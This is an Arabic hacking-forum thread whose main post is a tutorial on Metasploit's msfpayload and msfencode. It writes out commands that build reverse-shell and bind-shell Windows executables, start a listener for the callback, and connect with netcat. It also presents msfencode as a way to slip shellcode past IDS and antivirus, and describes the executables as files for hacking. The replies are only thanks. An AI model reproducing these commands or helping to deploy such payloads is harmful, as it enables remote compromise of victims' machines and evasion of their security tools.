![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
|
السلام عليكم ورحمه الله وبركاته اليوم درسنآ يكمل الدرس السابق . 1- msfpayload msfencode -2 msfpayload : اداه مهمه لعمل الـ shellcode الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA طريقه عمله . كود:
./msfpayload payload var=val var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم كيف نعرف متغيرات الـ payload ؟ نعرفها عن طريق الامر كود:
./msfpayload windows/shell/reverse_tcp O ![]() local port= lport البورت الخاص بالمهاجم , local host = lhost ip الخاص بالمهاجم خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport bind_shell الحصول على شل بأتصال مباشر reverse_shell الحصول على شل بأتصال عكسي الان نعمل تطبيق . كود:
./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C ![]() الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload , البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe كيف نعمله على صيغه exe , بأستخدام mfspayload . مثال لعمل exe كود:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe طريقه التنصت للاتصال كود:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E مثال اخر كود:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe nc -vn 192.168.1.2 4444 ~~~~~~~~~~~~~~~~ msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV كود:
Usage: ./msfencode الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز . [] الان بقى الواجهات 1-msfconsole msfcli -2 msfgui -3 msfwe b -4 وراح يتم التطرق لها بالدرس القادم . قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس ! لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟ كود:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe nc -vn 192.168.1.2 4444 ولماذا > متعوب عليها استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض ! كود:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe طريقه التنصت للاتصال كود:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E الجواب راح تلقونه بالدروس السابقه اذا كنت متابع hint: الجواب 5 كلمات SiLv3r00t V4-team.com
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
**** لك اخي رعش |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
لاهنت اخي رعش جزاك الله الف خير تقبل مروري |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
جزاكم الله خيرا |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| الدرس الرابع - طريقة استخدام الهيكس(مهم لــ الدروس القادمه) | أحمد العرجان | دورة التــــشـــفـــــير | 7 | 23/08/2012 13:30 |
| [الدرس الرابع عشر] بعـض الطرق لحذفـ البآتش من الجهآز! | ViRuS_Ra3cH | دورة حماية الاجهزة | Evil-Cod3r | 9 | 21/04/2012 14:14 |
| الدرس الرابع البرامج لااختراق الاجهزة | DR.X | [ ارشــيــف الـــــــدورات والـدروس للـمـبـتـدـئـــــــيـن ] | 14 | 07/06/2011 22:15 |
| :: الدرس الرابع :: إستخدام أمر Shutdown & Sleep :: | Cyclone | دورة AutoIt v3 Script من | [ DST ] | 4 | 10/04/2011 16:15 |
| الدرس الرابع (دينامكية عمل ثغرة Remote command execution) | ViRuS_Ra3cH | دورة تخطي الحماية للسيرفرات | Crazy_Hacker | 0 | 18/03/2010 01:33 |
![]() |
![]() |
![]() |